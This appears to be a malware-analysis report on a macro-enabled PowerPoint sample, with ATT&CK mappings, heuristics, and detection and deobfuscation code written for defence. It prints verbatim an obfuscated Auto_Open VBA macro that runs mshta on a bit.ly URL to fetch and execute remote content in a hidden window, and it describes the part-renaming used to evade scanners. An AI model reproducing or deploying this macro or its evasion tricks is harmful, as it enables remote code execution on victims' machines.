Verdict: MALICIOUS
Risk score: 68

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a macro-enabled Office document, a PowerPoint OOXML package (its VBA part lives under ppt/), containing an Auto_Open VBA macro. The macro is lightly obfuscated: nearly every keyword and operand is split across lines with the VBA line-continuation character (`_`), and the strings "mshta" and "http://www.bitly.com/hwdinnwshdwdwqwhda" are assembled one character at a time, so a scanner that looks for contiguous tokens such as `Sub Auto_Open` or `mshta` in the raw source will not match. At run time it calls ShellExecuteA (Shell32.dll) with the "open" verb, "mshta" as the file and the bit.ly URL as the parameter, so mshta.exe, a Microsoft-signed system binary commonly abused to run remote HTA content, fetches and executes whatever the short link resolves to, likely a second-stage payload; `On Error Resume Next` hides any failure from the user. The show-window argument is the undeclared identifier SW_SHOWMinimize, which without Option Explicit evaluates to Empty and is coerced to 0 (SW_HIDE); the declared SW_SHOW and SW_SHOWMAXIMIZED constants are never used. The VBA project part was renamed from vbaProject.bin to ppt/asjdajdoawdoajwd.bin to evade path-based detection. One caveat when assessing delivery: Auto_Open fires automatically on open in Word and Excel, but PowerPoint only runs it automatically when the file is loaded as an add-in (.ppam), so the file extension the lure was sent with matters.
Heuristics (3)

- VBA project inside OOXML (medium; 2 related findings) [OOXML_VBA]: the document contains a VBA project, so VBA macros are present (project part renamed away from vbaProject.bin: ppt/asjdajdoawdoajwd.bin).
- VBA project part renamed to evade filename detection (high) [OOXML_VBA_PROJECT_RENAMED]: the VBA project is bound through the OOXML relationship type and content type (application/vnd.ms-office.vbaProject), but its part is not named vbaProject.bin. Microsoft Office always emits vbaProject.bin; renaming the part hides the macros from scanners that key on the path rather than on the relationship or content type (a trick observed in the SVCReady loader).
- Auto_Open macro (low) [OLE_VBA_AUTO]: an auto-executing Auto_Open macro is present. Matched line in script: `Sub _ Auto_Open _ ()`, i.e. the procedure name is split with line continuations and only matches once they are joined.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1082 bytes | 817a9dbeaaa9364c93657dabbb744ed2aaffd1239c48dd68da7e4a5d2df47b0b |
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/asjdajdoawdoajwd.bin | 14336 bytes | db1ca81719d617cc08b00e02cbfa5f5681ab2e2c6cb27765b86dbf9707e24e33 |

Preview of macros.bas (first 1,000 lines of the extracted script, verbatim):

```vb
Attribute VB_Name = "Module1"
Const _
SW_SHOW _
= _
1
Const _
SW_SHOWMAXIMIZED _
= _
3
Public _
Declare _
Function _
ShellExecute _
Lib _
"Shell32.dll" _
Alias _
"ShellExecuteA" _
(ByVal _
hwnd _
As _
Long _
, _
ByVal _
lpOperation _
As _
String _
, _
ByVal lpFile As String _
, _
ByVal lpParameters As String _
, _
ByVal lpDirectory As String _
, _
ByVal nShowCmd As Long) As Long
Function koko()
koko _
= _
"m" _
+ _
"s" _
+ _
"h" _
+ _
"t" _
+ _
"a"
End _
Function
Sub _
Auto_Open _
()
Dim _
RetVal _
As _
Long
On _
Error _
Resume _
Next
RetVal _
= _
ShellExecute _
(0, "open", koko, "h" _
+ _
"t" _
+ _
"t" _
+ _
"p" _
+ _
":" _
+ _
"/" _
+ _
"/" _
+ _
"w" _
+ _
"w" _
+ "w" + "." + "b" + "i" + "t" + "l" + "y" + "." + "c" + "o" + "m/hwdinnwshdwdwqwhda", _
"%public%" _
, _
SW_SHOWMinimize)
End Sub
```
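The two checks the heuristics above rest on, as an added example (this is not the report's own code nor the analyzer's): finding the VBA project through the OOXML content type and relationship type instead of the part name, so the renamed ppt/asjdajdoawdoajwd.bin is still flagged, and undoing the line-continuation and string-splitting obfuscation of the macro shown in the preview so that `Sub Auto_Open`, "mshta" and the bit.ly URL become visible to ordinary token matching. The package skeleton and the VBA excerpt are constructed here (the .bin part is placeholder bytes, not a real VBA project, and nothing is executed); the function names and the list of auto-exec procedure names are my own choices, and the folding step also handles the `&` concatenation operator, which the sample does not use.

```python
"""Added example; not code from this report or from the analyzer that produced it.
1. find_vba_parts/classify: locate VBA by OOXML content type / relationship type,
   so a project under a renamed part is still found where a vbaProject.bin path
   check misses it.
2. deobfuscate: join ' _' continuations and fold "m" + "s" + ... into "mshta".
The package and VBA excerpt are constructed for the demo; nothing is executed."""
import io
import posixpath
import re
import xml.etree.ElementTree as ET
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
VBA_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Auto-exec procedure names to look for (my selection, not an exhaustive list).
AUTOEXEC = re.compile(r"\bSub\s+(Auto_?Open|Auto_?Close|Document_Open|Workbook_Open)\b", re.I)


def find_vba_parts(zf):
    """Part names that carry VBA, found by content type or relationship type, never by filename."""
    parts = set()
    for ov in ET.fromstring(zf.read("[Content_Types].xml")).iter(CT_NS + "Override"):
        if ov.get("ContentType") == VBA_CONTENT_TYPE:
            parts.add(ov.get("PartName").lstrip("/"))
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        source_dir = posixpath.dirname(posixpath.dirname(name))  # ppt/_rels/x.rels -> ppt
        for rel in ET.fromstring(zf.read(name)).iter(REL_NS + "Relationship"):
            if rel.get("Type") == VBA_REL_TYPE and rel.get("TargetMode") != "External":
                target = posixpath.join(source_dir, rel.get("Target"))
                parts.add(posixpath.normpath(target).lstrip("/"))
    return parts


def classify(zf):
    """The report's two findings: VBA present, and VBA under a part not named vbaProject.bin."""
    findings = []
    for part in sorted(find_vba_parts(zf)):
        renamed = posixpath.basename(part).lower() != "vbaproject.bin"
        findings.append(("OOXML_VBA_PROJECT_RENAMED" if renamed else "OOXML_VBA", part))
    return findings


def join_continuations(src):
    """Join ' _' line continuations: 'Sub _\\nAuto_Open _\\n()' becomes 'Sub Auto_Open ()'."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)


_LIT = r'"(?:[^"]|"")*"'                      # one VBA string literal ("" is an escaped quote)
_CONCAT = re.compile(_LIT + r"(?:\s*[+&]\s*" + _LIT + r")+")


def fold_string_concat(src):
    """Collapse "m" + "s" + "h" + "t" + "a" (or the & form) into the single literal "mshta"."""
    def merge(m):
        return '"' + "".join(re.findall(r'"((?:[^"]|"")*)"', m.group(0))) + '"'
    return _CONCAT.sub(merge, src)


def deobfuscate(src):
    return fold_string_concat(join_continuations(src))


def string_literals(src):
    return re.findall(r'"((?:[^"]|"")*)"', src)


def autoexec_names(src):
    return [m.group(1) for m in AUTOEXEC.finditer(src)]


def build_sample_package(part_name="ppt/asjdajdoawdoajwd.bin"):
    """Constructed OOXML skeleton with the report's part layout (placeholder .bin, no real VBA)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    f'<Override PartName="/{part_name}" ContentType="{VBA_CONTENT_TYPE}"/></Types>')
        zf.writestr("ppt/_rels/presentation.xml.rels",
                    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                    f'<Relationship Id="rId9" Type="{VBA_REL_TYPE}" '
                    f'Target="{posixpath.basename(part_name)}"/></Relationships>')
        zf.writestr(part_name, b"placeholder bytes, not a VBA project")
    return zipfile.ZipFile(io.BytesIO(buf.getvalue()))


# Constructed excerpt modelled on the report's preview: same obfuscation, same strings.
SAMPLE_VBA = "\n".join([
    "Function koko()",
    "koko _", "= _", '"m" _', "+ _", '"s" _', "+ _", '"h" _', "+ _", '"t" _', "+ _", '"a"',
    "End _", "Function",
    "Sub _", "Auto_Open _", "()",
    "On _", "Error _", "Resume _", "Next",
    "RetVal _", "= _", "ShellExecute _", '(0, "open", koko, "h" _', "+ _", '"t" _', "+ _",
    '"t" + "p" + ":" + "/" + "/" + "w" + "w" + "w" + "." + "b" + "i" + "t" + "l" + "y" + "." '
    '+ "c" + "o" + "m/hwdinnwshdwdwqwhda", _',
    '"%public%" _', ", _", "SW_SHOWMinimize)",
    "End Sub",
])

if __name__ == "__main__":
    print(classify(build_sample_package()))                      # renamed part is flagged
    print(classify(build_sample_package("ppt/vbaProject.bin")))  # ordinary macro document
    deob = deobfuscate(SAMPLE_VBA)
    print(autoexec_names(deob), string_literals(deob))
```

Run as a script it prints the renamed-part finding for the constructed package, the plain OOXML_VBA finding for the same package with the conventional part name, and then the auto-exec name and the recovered literals ("mshta", the bit.ly URL, "%public%") from the normalised macro. The content type and relationship type are the identifiers OOXML actually uses to bind a VBA project, which is why a scanner keyed on them is indifferent to what the part is called.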